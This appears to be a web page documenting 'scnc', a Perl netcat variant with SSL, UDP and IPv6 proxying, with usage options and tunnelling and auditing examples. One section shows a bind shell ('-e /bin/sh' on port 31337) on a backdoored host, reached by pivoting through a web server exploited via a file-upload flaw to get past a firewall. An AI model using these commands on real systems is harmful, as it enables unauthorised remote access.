SSL Capable NetCat (and more)
You all know what is
(written by Hobbit in 1996), how to use it and that it should have been integrated in all UNIX systems a long time ago.
lacked some features, and I tried to add them in this Perl version. For example, SSL support, TCP and UDP proxying and IPv4/IPv6 proxying features. This is now done, unless I missed a bug. Now, enjoy.
SSL Capable NetCat 1.05
Usage: scnc [-options] host port
See `perldoc scnc' for full documentation
-c use SSL (default to not)
-a ca.pem use SSL certificate authority file
-f cert.pem use SSL certificate file (PEM format)
-k cert-key.pem use SSL private key file (PEM format)
-6 use IPv6 (default to not)
-t do telnet negociation (default to not)
-e cmd command to execute
-l listen for connections (default to not)
-p port use local port number (default to random high)
-s address use address for bindings (default to all addresses)
-u use UDP socket (default to TCP)
-v be verbose (default to not)
-z test port for openness
-w timeout timeout before closing connection (default to infinite)
-S program use program as a send hook
-R program use program as a receive hook
-r host:port proxy connection to host:port
-r host:port:ipv6 proxy connection to host:port using IPv6
-r host:port::ssl proxy connection to host:port using SSL
-r host:port:ipv6:ssl proxy connection to host:port using IPv6 and SSL
Securing a connection with a SSL tunnel
You have a server and a client (of course) that you control. You have a service that does not support SSL but you want to establish a SSL connection to avoid a peer being able to read your traffic. The solution is to create a SSL tunnel (like with
- Server side (
scnc will listen on port 10000/TCP using SSL and redirect traffic to
localhost port 110/TCP):
prompt$ scnc -vc -a ca.pem -f server.pem -k server-key.pem -p 10000 -r localhost:110
server: SSL listening on: 0.0.0.0:10000 (IPv4)
- Client side (
scnc will listen on
localhost port 1110/TCP and redirect traffic to
server port 10000/TCP using SSL):
prompt$ scnc -v -s localhost -p 1110 -r server:10000::ssl
server: listening on: 127.0.0.1:1110 (IPv4)
Now, you can use your client side application and use
and port 1110/TCP as the server address. All traffic will use SSL to secure your connection.
Proxying SSL to access traffic in clear-text
You are auditing a HTTPS only web server. You want to use your classic sniffer or Web application proxying tool. So you want to remove the SSL encryption to ease your task.
- Client side to become a SSL proxy (
scnc will listen on
localhost port 1443/TCP and redirect traffic to
audited-server port 443/TCP using SSL and some client certificates):
prompt$ scnc -v -r audited-server:443::ssl -a ca.pem -f client.pem -k client-key.pem -s localhost -p 1443
server: listening on: 127.0.0.1:1443 (IPv4)
prompt$ scnc -v localhost 1443
client: connected to: 127.0.0.1:1443 (IPv4)
GET / HTTP/1.0
HTTP/1.1 302 Found
Date: Thu, 27 Apr 2008 11:25:50 GMT
You can now use your classic auditing tool and use
with port 1443/TCP as the target server. All traffic to
port 1443/TCP will be in clear-text.
Accessing IPv6 hosts from an IPv4 only host
You have a client IPv4 only machine and you have a dual-stack (IPv4/IPv6) machine. You do not want to configure a tunnel broker because in your particular context, you have not enough time. So you want to proxy an IPv4 connection to access an IPv6 server.
- On a dual-stack server machine (
scnc will listen on port 10000/TCP and redirect traffic to
www.kame.net port 80/TCP using IPv6 connection):
prompt$ scnc -vp 10000 -r www.kame.net:80:ipv6
server: listening on: 0.0.0.0:10000 (IPv4)
You can now use your classic IPv4 client application on your machine to connect to your
host port 10000/TCP. For our example, use Firefox to connect to the
port 10000/TCP. You should see the animated turtle.
Making IPv4 only programs working with IPv6
You have an application that only works in IPv4 mode. You want to make it accessible to IPv6 hosts.
- On the
server where an application works only in IPv4 mode (
scnc will listen on port 1666/TCP in IPv6 mode and redirect traffic to
localhost port 666/TCP using an IPv4 connection):
prompt$ scnc -v6p 1666 -r localhost:666:ipv4
server: listening on: :::1666 (IPv6)
You can now use your classic IPv6 client application to connect to your
host port 1666/TCP.
Say, you have a server listening on 31337/UDP, with a
backdoor. This port is firewalled, and you MUST use a port forwarding technic, because the only IP address allowed is the 192.168.10.200. This IP address has a service (a Web application written in PHP that allows you to upload and execute a command). This should be game over for this host, but you are not interested in it and want to go the easy way. You exploit the vulnerability to first upload
, then to execute it with proxying paramaters. Here we go:
- Backdoored target (172.16.10.1:31337/UDP):
prompt$ scnc -vul -e /bin/sh -p 31337
server: listening on: 0.0.0.0:31337 (IPv4)
- Proxying host with vulnerability (192.168.10.200:9000/UDP):
prompt$ scnc -vu -r 172.16.10.1:31337 -p 9000
server: listening on: 0.0.0.0:9000 (IPv4)
prompt$ scnc -vu 192.168.10.200 9000
client: connected to: 192.168.10.200:9000 (IPv4)
sh: turning off NDELAY mode
uid=1000(user) gid=1000(users) ...
You have now a fully working UDP proxied tunnel. If you have TCP access, of course, you should use TCP proxying.
Test SSL certificates
If you want to test SSL features, you can use the following certificates.
WARNING: they have been generated using the ugly Debian "patched" OpenSSL library :)